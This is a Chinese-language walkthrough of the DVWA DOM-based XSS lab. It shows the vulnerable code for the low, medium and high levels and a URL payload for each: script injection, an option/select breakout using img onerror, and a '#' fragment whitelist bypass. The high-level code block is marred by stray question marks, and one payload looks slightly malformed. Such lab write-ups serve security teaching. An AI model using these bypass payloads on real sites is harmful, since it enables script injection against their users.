### dom型xss
### ①、low
漏洞代碼:
```
<?php
# Don't need to do anything, protction handled on the client side
?>
```
由于未做任何安全校驗,直接構造payload:
```
http://localhost:8080/dvwa/vulnerabilities/xss_d/?default=English%3Cscript%3Ealert(1)%3C/script%3E
```
彈窗:
![](/upload/attach/201710/201710301749_l44zl5jlgzxtqi1.jpg)
### ②、medium
漏洞代碼:
```
<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
$default = $_GET['default'];
# Do not allow script tags
if (stripos ($default, "<script") !== false) {
header ("location: ?default=English");
exit;
}
}
?>
```
```
<p>Please choose a language:</p>
<form name="XSS" method="GET">
<select name="default">
<script>
if (document.location.href.indexOf("default=") >= 0) {
var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
document.write("<option value='' disabled='disabled'>----</option>");
}
document.write("<option value='English'>English</option>");
document.write("<option value='French'>French</option>");
document.write("<option value='Spanish'>Spanish</option>");
document.write("<option value='German'>German</option>");
</script>
</select>
<input type="submit" value="Select" />
</form>
```
分析與利用:
array_key_exists檢查數(shù)組里是否有指定的鍵名或索引,并且default值不為null。
stripos 返回default中字符串<script首次出現(xiàn)的位置(不區(qū)分大小寫),如果未發(fā)現(xiàn)返回false。且進入header跳轉(zhuǎn)。
此時<script>標簽不再可用,可以嘗試別的標簽 如:<img>, 先閉合</option></select>標簽,
構造payload:
```
http://localhost:8080/dvwa/vulnerabilities/xss_d/?default=English%3E/option%3E%3C/select%3E%3Cimg%20src=%27x%27%20onerror=%27alert(1)%27%3E
```
### ③、high?
漏洞代碼:
```
<?php
?
//?Is there?any?input?
if?( array_key_exists(?"default", $_GET ) && !is_null ($_GET[?'default'?]) ) {
?
????# White list the allowable languages
????switch ($_GET['default']) {
????????case?"French":
????????case?"English":
????????case?"German":
????????case?"Spanish":
????????????# ok
????????????break;
????????default:
????????????header ("location: ?default=English");
????????????exit;
????}
}
?
?>
```
分析與利用:
以上邏輯代碼只要不符合case,進入default語句,在?default=English設置#字符,因為#之后的字符串不會被發(fā)送到服務器上,構造payload如下:
```
/vulnerabilities/xss_d/?default=English#<script>alert(1)</script>
```